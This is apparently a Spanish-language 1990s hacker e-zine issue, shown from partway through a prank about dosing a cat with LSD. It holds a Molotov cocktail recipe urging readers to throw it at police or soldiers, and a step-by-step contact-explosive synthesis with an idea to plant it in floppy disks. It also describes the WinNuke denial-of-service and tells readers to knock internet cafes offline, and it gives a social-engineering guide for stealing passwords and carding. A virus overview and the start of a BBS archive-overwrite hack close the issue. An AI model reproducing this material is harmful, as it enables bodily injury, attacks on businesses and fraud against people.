avienta el psychodeliko gato al centro del piso (asegurate de ponerle
un collar con un liston en caso de que alcance a salir de la
superficie encerada)... El espectaculo causara un viaje estrepitoso
a tus neuronas y bastante frustracion al gato... juega con el gato
aventandole pelotas o su juguete preferido, etc... El ambiente puede
ser mejorado incluyendo musica con un volumen alto o algun record con
efectos especiales.
Esto puede ser hecho por 2 personas incluyendo obviamente otro hit
de acido (que sera tomado por la otra persona).
Cuidado: En el caso de incluir tachuelas en el piso encerado, los gritos
del gato pueden ocasionar un *MAL VIAJE* e impedir tu regreso a tierra !!
COCKTAIL MOLOTOV
~~~~~~~~~~~~~~~~
Materiales:
===========
-Gasolina
-Aceite de carro
-Trapos (peque¤os pedazos)
-Botella de vidrio tama¤o standard (refresco)
Instrucciones:
==============
Cuando tengas la botella completamente limpia rellena la mitad del
recipiente con gasolina y la otra mitad de aceite.
Pon un trapo mojado con gasolina bien apretado en la boquilla (culo)
que deje salir un buen cacho de trapo.
Prendele fuego al trapo y con todas tus ganas proyecta esa botella
a tu cuerpo policiaco favorito (preferentemente militares).
Explosivo de Contacto
~~~~~~~~~~~~~~~~~~~~~
Materiales (disponibles en cualquier botica)
============================================
- Cristales de yodo solido (deben ser cristales solidos!)
- Frasco de vidrio
- Amoniaco Puro
- Papel filtro (1 pieza)
Preparacion:
============
1. Coloca el yodo en el frasco.
2. Introduce suficiente amoniaco como para cubrir el yodo.
3. Deja reposar de una hora y media.
4. Filtra la solucion con el papel filtro.
5. Los cristales que quedaran en el filtro son EXPLOSIVOS!
6. Deja secar los cristales.
[ 8 dias despues Mr.X me envia el siguiente texto ]
Como se que muchos de ustedes al igual que yo seran lo suficientemente
curiosos como para intentar crear el explosivo de contacto, quiero contarles
el accidente que tuve en mi casa mientras seguia mi propia receta. Espero
aprendan de mi error todos aquellos que les interese hacer este tipo de
explosivos.
Ayer fui a una Botica y pedi 1 gramo de cristales de yodo. Me dieron un
frasco con la etiqueta "yodo metalico" y eran bolas de yodo (casi polvo).
Consegui el Amoniaco puro ahi mismo y rapidamente fui a la casa para
probar mi experimento. Mezcle en un recipiente metalico delgado y profundo,
el gramo de yodo con el suficiente amoniaco para cubrir totalmente el yodo.
Paso una hora y el yodo parecia hacerse una roca color metal. En hora y
media coloque el papel filtro que compre tambien en la botica en la boca
de un frasco y filtre el amoniaco. La mayoria del yodo lo tuve que sacar
ayudado de un lapiz y lo puse sobre el filtro a secarse. Lo curioso fue que
algunas gotas de yodo cayeron sobre la alfombra y cuando pasaba por ahi
caminando hacian una peque¤isima explosion. Eso me emociono lo suficiente
como para dormir pensando que al dia siguiente tendria sobre el filtro el
tan deseado explosivo de contacto.
Al dia siguiente me levante y el papel filtro estaba totalmente seco, el
yodo se habia vuelto gris y era muy parecido a la polvora. En un delirio
de estupidez se me ocurrio agarrar un poco de ese polvo, ponerlo sobre la
mesa y usando cualquier cosa aplastarlo para divertirme viendo las chispas.
Cuando iba metiendo la punta de un lapiz al centro del papel filtro donde
habia quedado todo el yodo BUUUUMMMMM!!!! Todo el papel filtro se hizo
pedazos !EN MIS MANOS! Hay GUEY me dolio la mano hasta el &$@!&$@! Mis oidos
se quedaron en un zumbido por media hora y mi dedo me¤ique aun sigue
sufriendo cuando trato de hacer cualquier cosa con el. AFORTUNADAMENTE solo
era un gramo de yodo lo que exploto en mis manos :)
Experiencia: Lo que aprendi fue simple, una vez seco el yodo NO SE TE OCURRA
NI SIQUIERA TOCARLO! Es SSUUUPPPPEEEERRR sensible al movimiento. la idea
que esto me dio es hacer unos 3 gramos de "yodo metalico" (cada uno en
recipientes separados en caso de accidente) y cuando aun esten humedos por
el amoniaco untarlos en la parte interna de un diskette y hacer lo descrito
en mi ultimo articulo "Attack of the killer WareZ". Ah, otra cosa que me
gustaria decir: El amoniaco es un liquido MUY VENENOSO! No abras el
recipiente con el amoniaco en un cuarto sin ventilacion y tampoco se te
ocurra inhalarlo. El yodo aun humedo NO ES EXPLOSIVO asi que en ese momento
puedes meterlo en peque¤as bolsas de tela, periodico etc.
Precios del Material:
Yodo: 16 pesos el gramo
Amoniaco: 8 pesos el recipiente
Papel Filtro: 2.50 la hoja
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Los Bugientos de Microsoft
~~~~~~~~~~~~~~~~~~~~~~~~~~
El ultimo bug reportado sobre Microsoft Internet Explorer (el ultimo en
esta hora, de seguro en una hora mas sale otro bug :=)) afecta a los usuarios
de MSIE 3.x y 4.x que tengan PowerPoint en sus computadoras, que como saben
viene con el MSOffice.
Este "error" permite que un Website malefico (huy que mello) ejecute
CUALQUIER programa en la computadora del usuario sin permiso, incluyendo
aquellos comando para borar archivos y transferir informacion privada (Dios
me perdone).
Esto se deba a la "integracion" de MSIE y PowerPoint. Existen como 60
millones de usuarios de Office, segun Gillermin Portones (el de lentes).
Esto quiere decir que los muchachitos de Microsoft no hacen su tarea o no
aprenden o no se que ondas... Pero pensaria uno que harian una revision de
toda la seguridad de su navegador...
Lo que permite este "feature", llamado action settings, que es utilizado
para crear presentaciones, es poder correr archivos ejecutables.MSIE permite
acceso externo a este "feature" de PowerPoint
Se espera un parche en microsoft.com.
Dicen las malas lengua que si juntaramos en un solo lugar todos los
patches de MSIE, se saturaria tanto el espacio, que Internet se colapsaria
como en unos 3 segundos. Eso dicen....
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
@ DUVAHAZARD @
Fluj0 D3 3n3R614 D161+4L
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
Este... pues... a peticion del publico.. UNO MAS de Microsoft! (siempre si
fueron como 3 segundos JE!)
Este bug hasta nombrecito tiene.. se llama Out of Band, que basicamente
lo que hace es sacar a los usuarios de una red ya sea NT, Win95 o hasta DOS!
Unos Hackers que hacian su trabajo descubrieron OTRO problema en
Microsoft networking que permite un cierto tipo de transmision que se llama
Out of Band, y que puede ser pasada a una maquina Windows, que a su vez
causa un Kaos cuando la recibe, osea CraSh totAl! (que bonito).
En respuesta, microsoft detuvo el Service Pack 3 de NT y hara un
arreglito...
Este bug que ha sido un temita bastante bueno en IRC, afecta cualquier
computadora con un sistema operativo de Windows con capacidad para Redes.
Esto quiere decir que maquinas con Windows, Windows NT - y hasta DOS - pueden
caer victimas al problema si estan en una red.
El programa que causa este problema ha estado flotando por IRC desde hace
algun tiempo, y hay muchas variedades como WinNuke, Muerte, y Sinnerz - sin
mencionar todos-los-faciles-de-hacer-scripts de Perl.
Debido a que el sofware esta disponible los ataques son amplios.
Los ataques como los que son creados por el Out of Band Request causan lo
que se le llama un servicio denegado, donde un servidor recibe un friego de
peticiones por archivos - lo cual no aguanta y no puede realizar. El programa
trabaja haciendo una simple coneccion TCP/IP a la direccion IP utilizando el
puerto Microsoft designado, 39.
Despues de realizar la coneccion, el programa transmite informacion por
la conexion usando una etiqueta llamada MSG_OBJ, que, en efecto, le comunica
a Winsock que mande informacion Out of Band. La informacion enviada
utilizando Out of Band no necesita ser algo especifico. Por ejemplo, WinNuke,
envia la palabra "Bye!" Una vez que la informacion Out of Band es recivida,
despues, esa maquina Windows detiene la comunicacion en la red completamente
y de ahi la negacion de servicio a los usuarios que tratan de conectarse.
[ Nota del editor: Los cafes que VENDEN el acceso a internet suelen usar a
Windows NT como su sistema operativo por su falta de conocimiento para
usar UNIX o LINUX. Ya saben, si quieren causar KaoZ a uno de estos cafes
solo tienen que conseguir WinNuke, saber la direccion I.P. de su cafe
local (por medio de email u otras formas ;-) y ponganlos fuera de negocio.
WINUKE v4 lo pueden conseguir en nuestra pagina en la seccion de WareZ ]
Sobres...
Portense bien...
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
Nosotros controlamos la transmision...
Punto.
@ DUVAHAZARD @
http://www.dynamo.com.mx/DUVAHAZARD/
DuvaHazard@hotmail.com
"FLuj0 D3 3n3r614 D161+4L"
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
EL FENOMENO VIRUS
por Orion
www.arrakis.es/~orion
Definicion
Un virus lo podemos definir, como un peque¤o programa cuyo objetivo es
perjudicar el funcionamiento de una computadora, por medio de las
instrucciones con que fue programado.
Podemos dar otra definicion de virus, aquella que los se¤ala como un
programa de ordenador capaz de replicar su codigo, de forma reiterada, en
el soporte distinto al que ocupa inicialmente.
Tal ha sido la evolucion de dichos virus en los ultimos a¤os, que su numero
aumenta vertiginosamente dia a dia, y se prevee que en el a¤o 2000,
podrian haber diez millones de virus en circulacion, y hasta hoy se conocen
cerca de 3000 programas en el mundo con estas caracteristicas.
Propiedades de los virus
Ademas de la caracteristica principal de estos programas, que es su facultad
de duplicacion, existen otros muchos caracteres de los virus, como son los
siguientes:
- Modifican el codigo ejecutable: Aqui aparece el adjetivo
"contagio". Para que un virus contagie a otros programas ejecutables, debe ser
capaz de alterar la organizacion del codigo del programa que va a infectar.
- Permanecen en la memoria de nuestro ordenador: Cuando un
usuario, inocente de las consecuencias, ejecuta en su ordenador un programa
con virus, este pasa a acomodarse en la memoria RAM. Esto lo hace para
adue¤arse de la computadora, y por asi decirlo, tomar el mando.
- Se ejecutan involuntariamente: Un virus sin ejecutar es
imposible que da¤e nuestra computadora. En ese momento esta en reposo, en
modo de espera, necesitando de alguien que por equivocacion ejecute el
programa "portador" (porque supongo que nadie ejecuta un virus en su ordenador
intencionadamente).
- Funcionan igual que cualquier programa: Un virus, al ser un
programa de ordenador, se comporta como tal, a lo cual hay que dar gracias.
Dicho programa necesita de alguien que lo ponga en funcionamiento, si no, es
software inutil.
- Es nocivo para el ordenador: Pero esto depende del virus
con el que tratemos. Podemos encontrarnos programas que destruyen parcial o
totalmente la informacion, o bien programas que tan solo concluyen en un
mensaje continuo en pantalla, aunque al final muy molesto.
- Se ocultan al usuario: Claramente, el programador del virus
desea que el usuario no lo advierta durante el maximo tiempo posible, hasta
que aparezca la se¤al de alarma en nuestro ordenador. Conforme pasa el tiempo,
los virus van desarrollando mas y mejores tecnicas de ocultamiento, pero
tambien se van desarrollando los programas antivirus y de localizacion.
Origenes
En el a¤o 1949, fue Jonh Von Newman, denominado por muchos como el padre de
la informatica, quien tras una serie de estudios reconocio la posible
existencia de un codigo o programa que pudiera reproducirse continuamente.
En Septiembre de 1984, fue Fred Cohen, quien expuso de forma publica el
termino "virus de ordenador", como aquel software maligno con capacidad de
reproduccion, tal y como definio Von Newman.
Desarrollo del fenomeno virus
En los ultimos a¤os, el area informatica ha experimentado un vertiginoso
crecimiento, y con esto, los programas que las compa¤ias distribuyen, que
cada vez alcanzan antes el periodo de madurez. Hace algunos a¤os, los
usuarios comenzaron a grabar los programas, debido al alto precio de los
mismos, lo que llevo a los programadores de virus a encontrar el principal
modo de distribucion. Podemos, por otro lado, enunciar otras fuentes de
desarrollo de los virus como son las redes, el freeware y shareware, las
BBS, y la aparicion de programas sencillos de creacion de virus.
TIPOLOGIA
Los virus que hasta ahora se han descubierto, se clasifican en base a lo
siguiente:
- Virus de sector de arranque
- Virus de tabla de particion
- Virus de fichero
- Virus multipartes
- Otros
Virus de sector de arranque
Se clasifican dentro de este apartado, aquellos virus que son capaces de
variar o reemplazar el sector de arranque de un disco duro, como objetivo
final del contagio.
Dicho programa desplaza la version original del sector de arranque,
llevando a la imposibilidad de sobreescritura en dicho sector alterado.
Tales sectores se le apareceran al usuario como en mal estado o inutiles.
Los virus de este tipo, se almacenan en la memoria RAM del ordenador, y se
ejecutan cada vez que el usuario encienda el ordenador.
Virus de tabla de particion
Este tipo de virus, altera la oportunidad que el sistema operativo DOS nos
da a cada usuario, de dividir el disco duro en partes, llamadas
particiones.
Resulta muy poco comun encontrar un virus de este tipo totalmente, pues
para ello el mecanismo de infeccion de este se realizaria de tabla de
particion de un disco duro, a tabla de particion de otro disco duro. Podria
darse, en sistemas de redes locales, es decir, en sistemas de ordenadores
ampliamente intercomunicados.
Virus de fichero
Los virus de fichero son capaces de modificar los ficheros con diversas
extensiones(exe,bat,etc..). El contagio de un virus de este tipo hace
engordar, por asi decirlo, el programa infectado, pues el virus pasa a
formar parte de el.
Cuando se ejecuta un programa contaminado, el virus toma el control y se
instala, como siempre hemos visto que suele hacer, en la memoria RAM de la
computadora. A partir de este momento, el virus esta completamente
preparado para hacer de residente en un programa, e ir expandiendose poco a
poco a los demas programas de nuestro ordenador.
Virus multipartes
Cuando los programadores de virus desean incrementar las caracteristicas
expansivas y de contagio de un virus, aparecen en escena los llamados
multipartitas. Estos virus son capaces de infectar cuatro posibles
elementos: tabla de particion del disco duro, sector de arranque de disco
duro, sector de arranque de disquete, y fichero ejecutable. Tambien
llamados multipartes, estos "simpaticos", son capaces de contagiar dos o
mas elementos de los que he nombrado anteriormente.
Otros
Aparte de los cuatro tipos de virus que he descrito hasta ahora, podemos
diferenciar tres programas peligrosos, y como no, perniciosos para nuestro
ordenador. estos son los siguientes:
- Gusano: Podemos definir de esta manera a aquellos programas
que se desplazan por la memoria de una manera independiente, es decir, sin
tener que acogerse a otros programas como el virus. Cuando dicho gusano
encuentra zonas de memoria desocupadas, las ocupa con el fin de poder
realizar copias sucesivas de si mismo.
En base a estos programas, podemos contar lo sucedido con referencia a la
red. El "gusano de internet", fue un programa escrito por Robert Morris Jr.
con 23 a¤os, y liberado la noche del 2 de noviembre de 1988. Este programa
era capaz de duplicarse por internet, y asi lo hizo; desafortunadamente, el
gusano se paso de la raya y se multiplico incontrolablemente. En muy poco
tiempo, la mayor parte de internet tuvo que ser cerrada, causando asi uno
de los mayores trastornos informaticos de la historia.
- Caballo de Troya: La caracteristica esencial de estos
programas es la carencia del factor de autoreplica, ejecutandose su codigo
maligno tan solo cuando se ejecuta el programa que lo porta(caballo de troya).
De esta manera, es un programa creado para ofrecer al usuario una apariencia
inofensiva, pero escondiendo un modulo capaz de destruir informacion. Hace
algunos a¤os, muchas empresas espa¤olas, recibieron un disquete con
informacion sobre el Sida, pero que incluia un caballo de troya que destruia
datos.
- Bomba Logica: Dichos programas se caracterizan por estar
ocultos al usuario, en modo de espera, hasta que llega un plazo determinado,
que es cuando se ejecutan. Hasta entonces, el usuario no notaba absolutamente
nada extra¤o en su ordenador. El tipico ejemplo de estos programas es el
"Viernes 13", que se ejecuta tal fecha, hasta lo cual, lo unico que hace es
ocupar una peque¤a porcion de memoria.
TECNICAS DE OCULTAMIENTO
La condicion de permanecer oculto al usuario, durante un cierto periodo de
tiempo, mientras se realiza el mayor numero posible de copias, la llevan a
cabo los virus mediante una serie de tecnicas de ocultamiento, que
denominamos como tecnicas stealth. Cuanto mas precisas y avanzadas sean las
tecnicas que utilice cada virus, mas tiempo permanecera escondido a los
ojos del usuario. Normalmente, dichas tecnicas son programadas mediante dos
procesos diferentes:
- Intercepcion de interrupciones: Todas las aplicaciones que
se ejecutan bajo DOS, utilizan una serie de interrupciones para comunicarse
con el sistema operativo, y solicitar ciertas acciones necesarias del mismo.
Si por cualquier causa un virus sustituye cualquier interrupcion, cualquier
solicitud que cualquier programa haga de la misma, puede ser redireccionada
por este, y asi llevar a cabo su funcion.
- Encriptacion del codigo del virus: Dicha tecnica persigue
que el virus aparezca diferente en cada una de las infecciones que lleve a
cabo. De esta manera, dos infecciones de un virus que utiliza la encriptacion
del codigo, solo seran iguales si utiliza la misma clave de encriptacion. La
unica forma de deteccion comun es identificar el algoritmo de mutacion que ha
realizado el virus.
Las tecnicas mas interesantes de ocultamiento de los virus, son las
tecnicas avanzadas, y por ello van a ser las tratadas a continuacion. Cabe
destacar que los virus tambien pueden no tener tecnicas, o tenerlas basicas
o medias.
Principalmente, las tecnicas avanzadas constan de cuatro posibles acciones,
que son las siguientes:
- Localizacion de un antivirus: Existen virus residentes en
memoria que analizan los diferentes programas, buscando programas antivirus.
Si localizan alguno de ellos, el virus automaticamente desinfecta los ficheros
infectados, y aparentemente sale de la memoria. De esta manera, el programa
pernicioso ense¤a al usuario los ficheros tal y como estarian normalmente,
sin su presencia.
- Intercepcion de arranques en caliente: Las tecnicas
avanzadas de un virus pueden incluso simular un arranque en caliente (llamamos
asi al tipico ctrl-alt-supr), sin abandonar la memoria RAM.
- Utilizacion de algoritmos de encriptacion: Esta tecnica de
los virus persigue evitar la localizacion de signaturas que realizan los
programas de deteccion de virus, cuando son ejecutados.
- Grabacion aleatoria de rutinas no significativas: Los
programadores expertos, usan dicha tecnica con las rutinas no significativas
de los virus en su proceso de infeccion.
SINTOMAS DE CONTAGIO
Quiza las personas que hasta aqui han leido pensaran, ¨ pero como localizo
un virus en mi ordenador si las tecnicas de ocultamiento son tan avanzadas ?
A continuacion voy a exponer los sintomas mas caracteristicos de la infeccion
de un virus:
- Cambios en las caracteristicas de los ficheros ejecutables:
Casi todos los virus de fichero, aumentan el tama¤o de un fichero ejecutable
cuando lo infectan. Tambien puede pasar, si el virus no ha sido programado
por un experto, que cambien la fecha del fichero a la fecha de infeccion.
- Aparicion de anomalias en el teclado: Existen algunos virus
que definen ciertas teclas que al ser pulsadas, realizan acciones perniciosas
en el ordenador. Tambien suele ser comun el cambio de la configuracion de las
teclas, por la del pais donde se programo el virus.
- Aparicion de anomalias en el video: Muchos de los virus
eligen el sistema de video para notificar al usuario su presencia en el
ordenador. Cualquier desajuste de la pantalla, o de los caracteres de esta
nos puede notificar la presencia de un virus.
- Se modifican el Autoexec.bat y el Config.sys: En ciertas
ocasiones, los virus modifican dichos ficheros para adaptarlos a su presencia,
al igual que las aplicaciones de software.
- Reduccion del tama¤o de la memoria RAM: Un virus, cuando
entra en un ordenador, debe situarse obligatoriamente en la memoria RAM, y
por ello ocupa una porcion de ella. Por tanto, el tama¤o util operativo de la
memoria se reduce en la misma cuantia que tiene el codigo del virus.
- Desaparicion de datos: Esto es consecuencia de la accion
destructiva para la que son creados casi todos los virus. Depende de la
maldad del virus si se borran con la orden DEL, o mediante el uso de
caracteres basura, lo que hace imposible su recuperacion.
- El disco duro aparece con sectores en mal estado: Algunos
virus usan sectores del disco para camuflarse, lo que hace que aparezcan como
da¤ados o inoperativos.
- Aparicion de mensajes de error inesperados: Lo mas normal,
es que en ciertos virus, el sistema operativo produzca errores inusuales,
cosa que debe alertar al usuario.
- Reduccion del espacio disponible del disco: Ya que los
virus se van duplicando de manera continua, es normal pensar que esta accion
se lleve a cabo sobre ficheros del disco, lo que lleva a una disminucion del
espacio disponible por el usuario.
DETECCION DEL CONTAGIO
Como muchos de los sintomas que he puesto anteriormente, pueden venir causados
por defectos de Hardware, y no por un contagio de virus, te expongo a
continuacion un peque¤o truco para detectar la presencia de este. A veces nos
creemos que un virus tiene la culpa de todo lo que nos pasa, y en cambio lo
que debemos hacer es cambiarnos el disco duro, o alguna de las tarjetas que
componen nuestro ordenador. El truco que puedes usar, aunque hay muchos, y
que te tendra al corriente de la posible infeccion consiste en prepararle una
trampa al virus, y es el siguiente:
Consiste en usar un peque¤o programa ejecutable, que se pondra como trampa
al virus. El tama¤o de dicho programa debe conocerse en todo momento, y
ejecutandolo veremos si nuestro ordenador esta infectado o no. Para ello
crearemos un fichero trampa con extension .COM de la siguiente manera:
COPY CON ORION.COM
<alt-144> <alt-205> <barra espaciadora> <F6> <intro>
Las frases anteriores crean un peque¤o fichero ejecutable llamado ORION, de
mas o menos 3 bytes de tama¤o. Para ver si tenemos virus en la memoria RAM,
tendremos que ejecutar ORION.COM, y comparar su tama¤o despues de
ejecutado. En resumen, se debe hacer esto:
ORION.COM
DIR ORION.COM
[ Si el archivo ejecutable ha cambiado de tama¤o, seguramente tendremos un
sistema infectado con algun virus. Pero, esta simple prueba no es 100%
eficaz para detectar un virus, ya que algunos de estos miden el archivo a
infectar y en caso de ser menor de, digamos, 100 bytes no lo infecta. ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
***** ING3NI3RA SOCIAL ******
~~~~~~~~~~~~~~~~
Original de Carlos Truco
- ¨QUE FREGADOS ES?
-----------------
Supongo que muchos de ustedes, tendran por lo menos alguna idea de lo que es
la ingeniera social, y lo util que es para el carding o el hacking. En muchos
casos resulta un elemento indispensable, siendo una fuente de informacion
basica para realizar estas actividades. Sin embargo habra mas de uno que a
pesar de, usarlo a diario no conoce algunas tecnicas que le facilitaran esta
labor. Asi pues, que fregados es la ingenieria social? La ingeniera social
es basicamente la manipulacion de otra(s) persona(s) con el fin de obtener
alguna informacion o cosa que dicha persona tiene, y que nos pudiera resultar
util a nosotros.
Ejemplos:
Hacemos ingeniera social cuando le hacemos la barba a nuestro jefe por un
aumento, o nos hacen ingeniera social cuando alguien nos llama por telefono
y sucede algo parecido a esto:
-Lamer : Bueno?
-Alguien: Con el Sr. Fulanito por favor.
-Lamer : El habla
-Alguien: Hola (con una voz segura y de secretaria), llamo de la empresa X
para decirle que ha sido agraciado con un viaje a Acapulco GRATIS!
Notese que usa la palabra GRATIS que junto con NUEVO son las dos palabras del
diccionario que influyen mas en la persona promedio.
-Lamer : Pero como yo?, (pensando para si, que su suerte ha cambiando porque
el jamas se habia ganado ni un pinche bolillo!)
-Alguien: Pues si, y me da gusto invitarlo a un coctel a la hora X donde se le
daran detalles.
-Lamer : Bien alla estare ahi, gracias...
-Alguien: Hasta luego...
Pues bien esta historia termina con dos noticias para el lamer, una buena y
otra
mala, la buena: Que si habia viaje, la mala: tiene que comprar un
departamento en Acapulco de sabe cuantos miles de dolares.... ya ni en pesos.
A pesar de esto el vendedor habia cumplido su objetivo: Utilizando la
ingeniera social llego a contactar a algunos posibles compradores de forma
directa, y no gastando mas que unos cuantos refrescos en el coctel.
Pues bien creo que con esta peque¤a explicacion habra quedado claro lo que es
la ingenieria social. Sin embargo en lo que resta de este texto espero darte
algunas tecnicas que te pueden servir al estar hackeando o al realizar
carding.
-ANTES DE LLAMAR A NUESTRO OBJETIVO:
-----------------------------------
La ingeniera social no es un proceso sencillo, y espontaneo, (a menos de que
seas bien chido como orador y tengas la suficiente cabeza como para afrontar
las muy variadas reacciones que puede presentar el que le llamas, sino
pareceras un imbecil y el terminara preguntandote en lugar que tu a el) sino
que requiere una gran cantidad de preparacion antes de ser usada. Dicha
preparacion esta en relacion directa a la informacion que deseemos obtener.
Entre mas informacion mas preparacion. Esa es una regla elemental que debes
saber.
Si quieres lograr tus objetivos deberas recordar esta tecnica.
No importa cuan experimentado estes en la ingeniera social, el periodo previo
a ella es elemental. Si por ejemplo sabes la lista de los usuarios de tu
servidor de internet y quieres saber el password de algun login en particular,
pues solo basta con llamarle, y parecer que sabes. La gente es muy tonta ante
ciertas situaciones. Solo hay que aparentar que sabes. A un lamer le puedes
salir con cualquier cosa estupida, pero siempre, SIEMPRE, hay que hacerle
creer al lamer de nuestro gran conocimento sobre lo que hablamos.
Sin embargo algunas veces a uno le toca mala suerte, y se llega a encontrar
con un imbecil que sepa de lo que estas hablando, las cosas se complican, y
tendras que ser mucho mas cuidadoso en lo que diras. Ahi es donde radica la
esencia de mejor primero planear una llamada. No te puedes poner nervioso,
porque la habras cagado. Si empiezas a parecer un ni¤o ridiculo todo lo que
hiciste y haras no servira de nada.
Asi para prevenir estas eventualidades, lo mejor sera primero planear algun
escrito o tener algun guion a seguir en la llamada. Ahi como se supondra, el
guion debera contener no solamente lo esencial de la llamda, sino incluso una
lista de las distintas preguntas que por tu culpa, posiblemente hara la
persona a la que le llamamos. Por que por tu culpa?. Sencillamente tu culpa
por que siempre deberas evitar que la otra persona pregunte, excepto en casos
en que sea inevitable. Tu deberas preguntar no el otro. Recuerda bien esto y
planea bien tu guion. El guion asi te funcionara como una herramienta
elemental y si te sirve bien, te puede servir para otras circunstancias
similares, como en el caso del carding. En algunos escritos encontraras que
es una ayuda, yo no lo considero asi, sino la base de la ingeniera social en
muchos casos.
Otra cosa que sera necesaria muchas veces es un telefono donde pueda
encontrarte la persona a la que llamas. Muchas veces son desconfiados por
naturaleza, o simplemente siguen los pasos predeterminados en dichos
procedimiento. Esta claro que algunas veces algunos entenderan lo que les
estas diciendo, y no creen que sea seguro decir cosas por telefono (cosa
bastante cierta). Claro esta que lo mas imbecil de tu parte seria darles el
numero de telefono de tu casa. Terminaras metido en grandes pedos, por tu
estupidez. Una opcion evidente es llamar de casa de algun conocido por
ejemplo, aunque claro esta tendras que hacerlo bajo ciertas circunstancias
que no pienso explicar aqui. Si se lo joden a el, pues ese ya es su pedo.
Aunque no se lo vayas a hacer eso por ejemplo a tu vieja. Existen formas de
hacerlo por un telefono publico, las cuales explicare en un numero posterior.
Aun asi existen circunstancias, en las que no importara llamar de nuestra
casa, porque a nadie le importara de donde llamaste. Eso ya depende de cada
caso en particular.
Ya por ultimo te voy a decir dos de los secretos basicos que te ayudaran, y
haran que seas un maestro en esto de la ingeniera social:
1 - Mantener tu presencia y dominacion sobre la persona a la que le quieres
hacer ingeniera social. Como dije antes lo mas importante durante la llamada
sera mantener su status de 31337, por decirlo asi, su status de lider. Tendras
que ingeniartelas para hacer al otro tu empleado, y tendras que ingeniartelas
para que el otro te considere a ti como el jefe. Todas las personas se creeran
todo si parece que sabes de lo que hablas. Asi acuerdate de esto:
Siempre has que la otra persona creas que tu eres el fregon en el tema, que
eres realmente el que sabes. Como dije TU sabes de lo que esta hablando,
ellos no saben de lo que estas hablando.
Siempre has que parezca que sabes lo que estas haciendo, porque si no lo haces
la persona dudara. No puedes titubear ante nada, siempre permanece firme en lo
que dices.
Y como dije antes, has tu las preguntas, que el otro no te las haga a ti.
2- Otra cosa que ayuda muchas veces, es el ambiente que se recrea. Si se
supone que hablas de una oficina debes de hacerle creer eso a la otra persona.
Esta claro que por ejemplo un sonido de maquina de escribir ayuda. O una
peque¤a grabacion de una oficina que tengas por ahi, ayudaran a crear las
condiciones mas propicias para la sugestion de la otra persona. Si se supone
que trabajas de una oficina no vas a tener el sonido de las caricaturas que
esta viendo tu carnal de 3 a¤os, o de las palomas que truenan en el
microondas, ni vas a escuchar a un vendedor gritando las porquerias que vende.
Eso sencillamente no va. Sin embargo en algunas condiciones necesitaras por
ejemplo que sea al aire libre. Eso ya te lo dejo a tu imaginacion. Si llamas
de una oficina algunos sonidos propios de la computadora seran validos
tambien. Es creible un beep de la computadora. Tambien seria valido un sonido
de telefono que pudieras haber grabado previamente.
En fin sera importante que consideres las tecnicas que te explicado, antes de
hacer la ingeniera social. Piensa bien lo que diras, y como lo diras. Eso
representa casi todo en la ingeniera social. Una cosa mas: Si puedes practica,
haz tu voz creible, di las cosas de una forma perfecta. Y no se te olvide en
el momento de llamar tu guion. Aunque te lo sepas de memoria, puede que se te
olvide y todo la planeacion se habra ido abajo. Y sera muy dificil que se
te pueda presentar la misma oportunidad, con la misma persona, casi imposible.
- DURANTE LA LLAMADA
------------------
Ahora es el momento de la verdad. Aqui tendras que hacerlo todo a la
perfeccion no podras fallar. He aqui los grandes consejos que tendras que
tomar en cuenta cuando llames:
1 - NUNCA te pongas nervioso: Siempre manten la calma, no importando las
condiciones y peligros a que te enfrentes. Esa es la cosa mas importante al
llamar. Si la persona a la que llamaste no te quiso proporcionar la
informacion que querias, nunca te desanimes. Probablemente te equivocaste en
tu guion, y no fue el adecuado. Revisa tus palabras y planea uno mejor.
Recuerda hacer uso de sonidos de fondo deacuerdo al ambiente que quieras
recrear. Si a pesar de esto no te funciona, pues intentalo con otra persona.
2 - Si la otra persona comienza a hacer preguntas, y no las tienes planeadas,
cuelga y llama mas tarde, probablemente tengas otras condiciones y se te
facilite el trabajo.
3 - Sigue estos dos consejos y prepara bien las condiciones antes de llamada:
tu guion a decir, con preguntas posibles, y un ambiente correcto, y estaras
del otro lado.
Si requieres informacion para el carding podras tener ya bien planeadas y
estructuradas tus preguntas despues de varias veces. Sabras quien te dara
informacion y quien no inclusive.
- CONCLUSION
----------
En fin con esto termino mi punto de vista acerca de lo que es el carding y
los distintos metodos utilizados para su realizacion. Podria dar una lista
de la infinidad de sus usos y aplicaciones, pero creo que por hoy ya es
suficiente sobre el tema. Asi que mejor las dejo a tu imaginacion. Espero
haberlos iluminado.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Hackeando BBS's
=--=--=--=--=--=--=--=
Por: Khelbin
Para: Phrack
=--=--=--=--=--=--=--=
Este hack no describe una falla en la seguridad de una BBS o su software
sino en el tipo de archivador que este usando. Esta tecnica servira
unicamente en sistemas usando PKZIP/PKUNZIP como el archivador y que este
usandos flags especificas.
Muchas BBS's descomprimen los archivos recien 'subidos' al disco e incluyen
el flag -d y -o que crea los directorios que existen en el archivo zip y
sobre-escribe los archivos existentes.
Tomemos el ejemplo de una BBS usando Renegade con un setup standard:
C:\RENEGADE\
C:\RENEGADE\TEMP\
C:\RENEGADE\DATA\
Supongamos que el archivo copiado a la BBS es copiado a C:\TEMP donde es
descomprimido y revisado de virus. C:\RENEGADE\DATA\ es donde el archivo
USERS.DAT esta guardado conteniendo toda la informacion de los usuarios.
